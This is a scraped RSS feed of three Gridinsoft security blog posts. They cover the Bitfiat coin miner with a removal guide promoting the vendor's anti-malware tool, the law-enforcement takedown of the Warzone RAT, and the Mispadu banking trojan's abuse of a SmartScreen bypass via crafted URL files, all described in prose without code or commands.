Bitfiat Process High CPU – Explained & Removal Guide https://gridinsoft.com/blogs/bitfiat-process-high-cpu/ https://gridinsoft.com/blogs/bitfiat-process-high-cpu/#respond Wed, 28 Feb 2024 15:28:06 +0000 https://gridinsoft.com/blogs/?p=20018 Bitfiat is a malicious coin miner that exploits your computer’s hardware to mine cryptocurrencies. Such malware takes as much resources as it can, making the system impossible to use. Let’s see what this malware is, and how to remove it. Bitfiat Overview The Bitfiat process is related to the activity of a malicious coin miner.… Continue reading Bitfiat Process High CPU – Explained & Removal Guide

The post Bitfiat Process High CPU – Explained & Removal Guide appeared first on Gridinsoft Blog.

]]>
Bitfiat is a malicious coin miner that exploits your computer’s hardware to mine cryptocurrencies. Such malware takes as much resources as it can, making the system impossible to use. Let’s see what this malware is, and how to remove it.

Bitfiat Overview

The Bitfiat process is related to the activity of a malicious coin miner. Such malware uses your computer’s resources to mine cryptocurrencies, mainly Monero or DarkCoin. An unusual part about Bitfiat is its origins: it is based on its own technology rather than using XMRig code. This, however, is the last part where it is different from other malware miners – its behavior is as unpleasant as in other cases.

As for the symptoms, they are typical: it causes the CPU to run at maximum capacity, often reaching 100%. You may also notice that your computer’s fan runs at full speed even when you are not using any programs. Moreover, this process usually appears in Task Manager and consumes the most resources. Although coin miners usually don’t harm your files, they make your system unusable due to an overloaded CPU.

The Bitfiat process in Task Manager screenshot
The Bitfiat process in Task Manager

Bitfiat Virus Analysis

Despite having the origins different from the majority of malware miners, the infection chain of Bitfiat is pretty much the same. Let’s start from the very beginning and explore the operations of this malware. Fortunately, there are enough samples to analyze.

Spreading Methods

Bitfiat propagates through various channels, primarily leveraging cracked software and software activators “cracks”. These cracks are often distributed through illicit channels (like torrents) and online forums. It entices users with the promise of unlocking premium software features without needing to purchase. Even though it sounds like fairy tales, unwary users keep downloading such “free” premiums.

Another spreading way is botnets. By paying a coin to the masters of a botnet established with dropper malware, crooks can provide themselves with massive amounts of mining nodes. Thing is, after deploying the malware like a coin miner the entire malware spreading chain will be uncovered, and the dropper will be most likely removed from the machine. To maximize profits, miners are spread along with other “visible” malware, like ransomware or proxyware.

Launch, C2 Connection & Mining

The majority of Bitfiat samples do not have any detection evasion tricks. And, well, how can you evade the detection when your process takes up to 80% of the CPU? Right after launching, the malware performs an IP check, then collects some basic info about the system and connects to the command server.

Command servers used by Bifiat are rather unusual: there is no direct connection to the “main” C2. Instead, malware retrieves the needed instructions from the other infected machine, i.e. they operate like a p2p network. This provides much better stability, up to autonomous existence in the cases when the command server is unresponsive.

P2P architecture C2 Bitfiat

The said instructions in a form of config file contain the info about mining pool and crypto wallet address. After executing a few command prompt lines, it starts the mining process. And this is the point where the most noticeable sign of a malware miner activity appears – overloaded CPU and a strange process in the list of running programs.

How To Remove Bitfiat?

Effective removal of the crypto miner requires a complex approach to neutralize all malware actions. Unlike other types of malware, a miner can overload the system so that the removal tool has no resources left. To avoid these issues, the removal guide should have one more step.

  • Download and install GridinSoft Anti-Malware. The first thing to do is to deploy the removal tool, even though it will be used later.

Bitfiat Process High CPU – Explained & Removal Guide

  • Switch your Windows to Safe Mode with Networking. By booting into the Safe Mode with Networking, you prevent the Bitfiat process from exerting its influence on the CPU. This will facilitate uninterrupted removal by antivirus software.
  • Start the Full Scan. By running a Full Scan, you make the program check every single element of the system. Such a thorough scan is essential to ensure that all the malware present in the system is removed. After the scan, click “Clean Now” to get rid of all the detected items.

The post Bitfiat Process High CPU – Explained & Removal Guide appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/bitfiat-process-high-cpu/feed/ 0 20018
Warzone RAT Dismantled, Members Arrested https://gridinsoft.com/blogs/warzone-rat-dismantled/ https://gridinsoft.com/blogs/warzone-rat-dismantled/#respond Mon, 12 Feb 2024 21:39:18 +0000 https://gridinsoft.com/blogs/?p=19579 In an international law enforcement operation, the U.S. Department of Justice continues its fight against cybercriminals. The operation dismantled a network that sold and supported the Warzone Remote Access Trojan (RAT). Also, this malware allowed cybercriminals to stealthily infiltrate victims’ computers, resulting in data theft and other malicious activities. Warzone RAT Masters Arrested and Charged… Continue reading Warzone RAT Dismantled, Members Arrested

The post Warzone RAT Dismantled, Members Arrested appeared first on Gridinsoft Blog.

]]>
In an international law enforcement operation, the U.S. Department of Justice continues its fight against cybercriminals. The operation dismantled a network that sold and supported the Warzone Remote Access Trojan (RAT). Also, this malware allowed cybercriminals to stealthily infiltrate victims’ computers, resulting in data theft and other malicious activities.

Warzone RAT Masters Arrested and Charged

The operation of US Department of Justice resulted in the indictment of two key figures. Daniel Meli, 27, of Zabbar, Malta, and Prince Onyeosiri Odinakachi, 31, of Nigeria. Meli was detained in Malta, facing charges of unauthorized computer damage and selling electronic interception devices. Odinakachi, arrested in Nigeria, is charged with conspiracy to commit computer intrusion offenses.

warzone web site
Announcement of seized of the website www.warzone[.]ws.

These arrests are the result of international cooperation in combating this threat. The success of the operation was largely due to the collaborative efforts of various international law enforcement agencies, including the FBI, Europol, the Economic and Financial Crimes Commission of Nigeria, and others. This coordinated approach has helped in the fight against cybercrime, which is increasingly borderless.

Implications and Sentencing

The charges against Meli and Odinakachi carry penalties of up to five years in prison, three years of parole, and a $250,000 fine. These lawsuits send a strong message to cybercriminals and those who facilitate their activities. Certainly, the international community is taking strong action to protect cyber integrity and hold criminals accountable.

James R. Drabick and Carol E. Head, who are Assistant U.S. Attorneys for the District of Massachusetts, obtained seizure warrants for Odinakachi. Drabick is also prosecuting the case against Odinakachi. Meanwhile, Bethany L. Rupert and Michael Herskowitz, who are Assistant U.S. Attorneys for the Northern District of Georgia, are prosecuting Meli.

What is Warzone RAT?

Warzone RAT is a malicious remote access tool that allows unauthorized users to secretly access and control victims’ computers. The malware has facilitated a range of illegal activities, from data theft to webcam surveillance, without the knowledge or consent of victims. In early 2024, Warzone malware was marketed at $37.95 per month, and was primarily sold to individuals through the clear web page.

warzone on forum
Warzone RAT on Hack Forum

The overall action around Warzone is most likely to be a part of an anti-spyware policy wave that was raised in early February 2024. A number of governments across the globe, together with major security vendors, started the campaign against “legal spyware”. That includes both government-backed vendors of such malware and handymen who market malicious programs under the guise of legit surveillance tools. Such people will be detained or at least banned from entering the countries that participate in the campaign. The story around Warzone RAT may be not a major, but still a part of the action.

Warzone RAT Dismantled, Members Arrested

The post Warzone RAT Dismantled, Members Arrested appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/warzone-rat-dismantled/feed/ 0 19579
Mispadu Banking Trojan Exploits SmartScreen Flaw https://gridinsoft.com/blogs/mispadu-banking-trojan-exploits-smartscreen-flaw/ https://gridinsoft.com/blogs/mispadu-banking-trojan-exploits-smartscreen-flaw/#respond Mon, 05 Feb 2024 14:03:26 +0000 https://gridinsoft.com/blogs/?p=19408 Recent research uncovers a new sample of Mispadu malware that uses a SmartScreen bypass flaw to integrate itself into the system. This banking trojan from 2019 uses the vulnerability discovered in late 2023 to target mainly LATAM users. Mispadu Trojan Uses SmartScreen Bypass The extensive research regarding Mispadu malware done by Unit 42, among other… Continue reading Mispadu Banking Trojan Exploits SmartScreen Flaw

The post Mispadu Banking Trojan Exploits SmartScreen Flaw appeared first on Gridinsoft Blog.

]]>
Recent research uncovers a new sample of Mispadu malware that uses a SmartScreen bypass flaw to integrate itself into the system. This banking trojan from 2019 uses the vulnerability discovered in late 2023 to target mainly LATAM users.

Mispadu Trojan Uses SmartScreen Bypass

The extensive research regarding Mispadu malware done by Unit 42, among other things, underscores the use of a critical vulnerability in Windows to circumnavigate SmartScreen protection. The flaw, known as CVE-2023-36025, was detected and fixed by Microsoft back in November 2023. However, as of early February 2024, there are already several cases of malware exploiting that vulnerability, meaning that users hesitate to install a patch. Earlier, we wrote about a Phemedrone Stealer spreading campaign that uses the same detection evasion approach.

Said flaw is rather easy to exploit, as all that is needed is just a specifically crafted URL file. As such files are considered trusted by Microsoft Defender, the system will not pop up a SmartScreen banner warning about running the potentially dangerous file. In the background, this URL file forces the connection to the command server and downloads the payload in the form of a binary file.

URL File Mispadu malware
Contents of the URL file used to download Mispadu banker

Cybercriminals who stand behind Mispadu commonly use email spam to deliver these crafted URL files. However, other spreading ways may be even more successful, like, for example, sharing the file via social media, as Phemedrone masters do.

What is Mispadu Malware?

Mispadu itself is a rather unique example of a banking trojan that emerged back in 2019. It is distinctive by a peculiar region check method, persistent code encryption, and excessive obfuscation. For instance, to detect whether it runs in a prohibited region or not, it does not use a “traditional” IP address ban list. Instead, Mispadu checks the offset of the current system time from the UTC; it ceases further execution shall the value exceed the set limit.

Region check logic
Equation the malware runs to identify whether it can or cannot run in the region

This financial infostealer targets a range of financial websites, searching for the matches in the browsing history. Once Mispadu finds one present in its target list, it searches for the password in the browser’s AutoFill file and sends it to the command server. As a result, hackers get the full set of credentials related to financial services.

Despite having a flexible solution for targeting different banking and crypto services in different countries, the stealer focuses mainly on ones from both Americas and Western European countries. It is not clear whether such a selection is related to the location of malware masters or other factors.

How to Protect Yourself?

Malware like Mispadu is severe, though can rarely be called unavoidable. It exploits a well-known flaw, that is fixed in the latest Windows updates. There hence, by just updating the system you already demolish the primary injection vector this malware employs.

Nonetheless, it is worth keeping in mind that the file itself makes its way to the target system within a spam email. The latter remains the main propagation method for malware, scams , and phishing attacks. Know how to distinguish between a phishing email and a genuine one – and you will have much fewer chances to get into trouble at all.

Use a reliable anti-malware software as the additional protection layer. Everyone can make a mistake, and that’s completely normal – only those who do nothing will never make one. To get yourself backed up for such cases, I’d recommend using GridinSoft Anti-Malware – a reliable, lightweight, and easy-to-use anti-malware software. Its advanced detection mechanisms will be able to detect and stop any malware at its very beginning.

Mispadu Banking Trojan Exploits SmartScreen Flaw

The post Mispadu Banking Trojan Exploits SmartScreen Flaw appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/mispadu-banking-trojan-exploits-smartscreen-flaw/feed/ 0 19408